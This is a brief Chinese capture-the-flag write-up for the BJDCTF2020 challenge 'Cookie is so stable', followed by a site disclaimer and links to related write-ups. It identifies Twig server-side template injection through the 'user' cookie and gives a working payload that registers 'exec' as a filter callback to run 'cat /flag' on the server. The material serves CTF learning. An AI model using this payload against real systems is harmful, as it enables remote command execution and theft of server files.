0x00 知识点
Twig模板注入
链接:
https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig
0x01 解题
测试一下发现*wig模板注入
找注入点:
根据提示,cookie中的user是注入点
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
[BJDCTF2020]Cookie is so stable
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。
猜您在找
[BJDCTF2020]EzPHP
[BJDCTF2020]ZJCTF,不过如此
[BJDCTF2020]ZJCTF,不过如此
[BJDCTF2020]Easy MD5
BUUCTF--[BJDCTF2020]BJD hamburger competition
[原题复现]BJDCTF2020 WEB部分全部解
[BUUOJ记录] [BJDCTF2020]Easy MD5
BUUCTF [BJDCTF2020]Easy MD5 详解
[原题复现+审计][BJDCTF2020]Mark loves cat($$导致的变量覆盖问题)
BJDCTF-2020-WRITEUP---TiKi小组